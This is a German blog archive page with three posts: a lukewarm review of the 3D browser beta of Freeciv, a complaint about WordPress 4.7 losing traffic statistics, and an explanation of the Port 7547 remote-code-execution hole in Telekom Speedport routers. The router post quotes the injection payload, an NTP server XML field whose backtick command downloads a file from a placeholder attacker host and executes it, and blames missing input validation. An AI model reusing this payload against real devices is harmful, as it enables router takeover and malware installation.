Category Archives: Internet

Freeciv 3D Beta erschienen

Posted on by

Die FreeCiv Entwickler haben eine browserbasierte WEBGL Version von FreeCiv gebaut.

Angespielt werden kann das Game hier : play.freeciv.org

Natürlich habe das für Euch schon gemacht, aber so wirklich vom Hocker hat es mich nicht gehauen.

Aber erstmal die gute Nachricht: Es ist benutzbar.

  • – die Grafik ist naja, primitiv
  • – die Karte kann man nicht rotieren
  • – die gesamte Karte ist in Abschnitte eingeteilt, d.h.man springt von einem Gebiet in andere, übergreifende Züge sind nicht möglich.
  • – die 3D Form hilft nicht wirklich den Überblick zu behalten oder gar direkt alles anklicken zu können.
  • – die Produktionsverwaltung der Städte hat noch so leichte Bugs. Mit denen kann man aber leben.
  • – die KI war wohl auf „Devot“ gestellt 🙂

Fazit: 2D ist einfacher zu benutzen und schneller.

WordPress 4.7 wird Euch ggf. die Trafficstats löschen

Kaum auf 4.7 aktualisiert und schon sind die Webtrafficdaten der letzten 6 Monate weg.

Wer Ersatz braucht, muß leider von Null anfangen und das „Traffic Stats Widget“ Plugin installieren. Das fängt dann aber nach Installation wieder bei 0 zu zählen. Das von WP als Dropin installierte Plugin, sieht zwar nett aus, kann aber nur 24h auswerten und uns leider nicht sagen, wieviele Leute in den letzten Tagen/Wochen/Monaten da waren 🙁

 

Speedportrouter der DTAG von Sicherheitsloch betroffen

Posted on by

Jetzt ist es endlich final, die DSL-Speedportrouter der Deutschen Telekom haben ein Sicherheitsloch auf Port 7547 :

https://isc.sans.edu/diary/Port+7547+SOAP+Remote+Code+Execution+Attack+Against+DSL+Modems/21759

und ein echt dreckiges dazu, weil die Kisten a) auf jeden Zugriff reagieren und b) eine Remote-Execution möglich ist. Der Hack funktioniert so:

<NewNTPServer1>
`cd /tmp;wget http://angreiferszum nachladen von code/1>;chmod 777 1;./1`
</NewNTPServer1>
<NewNTPServer2></NewNTPServer2>
<NewNTPServer3></NewNTPServer3>
<NewNTPServer4></NewNTPServer4>
<NewNTPServer5></NewNTPServer5>

Natürlich gehört zu dem Request noch mehr, aber das sind die Grundlagen und aus dem Kontext kann man ersehen, daß hier einfach ein parameter aus dem Web genommen wird und an die Bash weitergereicht wird ohne den Inhalt auf Konsistenz zu prüfen. Ein einfacher Test, ob da ein Domainname/IP drinsteht, hätte das bundesweite Chaos vom Wochenende verhindert.

Die DSL-Router wurden Ihnen „proudly presented by Zyxel“ !!! Amis 😉